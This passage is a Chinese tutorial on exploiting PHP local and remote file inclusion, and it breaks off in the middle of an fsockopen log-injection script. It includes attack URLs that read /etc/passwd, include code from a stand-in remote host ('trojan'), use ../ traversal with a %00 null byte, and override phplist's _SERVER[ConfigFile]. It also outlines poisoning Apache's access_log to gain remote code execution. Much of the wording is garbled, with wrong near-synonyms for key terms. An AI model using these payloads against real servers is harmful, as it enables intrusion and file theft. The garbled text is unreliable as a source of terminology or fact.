php包罗破绽替换手艺 
================ 
php开发者们犯得一个基本的错误是把一个不正当的变量传递给系统函数，特别是include()和require()这两个函数。 
这个常见的错误导致了众所周知的远程文件包罗破绽和内陆文件包罗破绽。在已往的几年中，php已经最先试图通过缺省设置来消除或限制这种破绽的所带来影响。 
但即使是简朴的内陆文件包罗，也会有新的手艺去行使这些破绽来导致远程下令的执行。 
================ 
先容php包罗破绽 
================ 
文件包罗破绽的要点是要去找到一个方式来包罗带有你的php恶意代码的文件。 

include($_GET['content']); 
?> 
http://target/index.php?content=/etc/pa sswd 
http://target/index.php?content=http://trojan/exec.php 
这是第一个例子，它包罗了内陆文件/etc/pa sswd第二个例子包罗了一个远程文件，这个远程包罗文件在大多数情况下不能使用，由于php设置中的allow_url_fopen默认是off。 
固然，通常有此破绽的php代码会比上面的例子更有限制性，通常是通过在前面加上一个目录，防止远程文件包罗，前面加一个文件扩展名来限制可以包罗哪些类型的文件。 

include("pages/".$_GET['content'].".php"); 
?> 
http://target/index.php?content=../../../etc/pa sswd%00 
.../的使用允许目录横向气概的操作，使你可以操作代码中预定目录以外的目录的文件。 
若是php设置中open_basedir为on，它将会阻止你绕过过多的目录。 
网站的开发者有可能也会使用一些函数来过滤掉来自用户提交的恶意数据，但并非总是云云。 
空字节字符%00(\0)终止字符串，来切断在它之后提交的任何东西，即是当magic_quotes_gpc 默以为on的时刻，也可以逃过。 
在http://ush.it网站中有一篇名为《PHP文件系统的攻击前言》提供了可能的方式来应付空字节字符。 
php剧本平安也可能取决于像$_GLOBAL[]或$_SERVER[]等的变量，像最近被发现的phplist的破绽（phplist是一款外国的Email程序），例子为 
http://target/phplist/admin/?_SERVER[ConfigFile]=/etc/pa sswd 
================== 
内陆文件包罗致远程代码执行 
================== 
一次你找到一个内陆包罗破绽，你需要找到一个方式去把你的恶意php代码插入一个文件中，大量的手艺在已往的几年中泛起。 
有一种在服务日志中去注入php代码的手艺比上面这些包罗破绽要泛起的晚。 
它是有可能的去把我们的代码插入http请求的头部，然后包罗Apache的access_log日志文件（它可能会举行一些测试去找到access_log）。 
考虑一下这个例子，在Mac OS X的Apache/PHP默认设置下，写一个剧本去发送一个请求可能是必须的，由于浏览器可能会对一些字符举行转义。 

$a = fsockopen("localhost",80); 
fwrite($a,"GET / HTTP/1.1\r\n".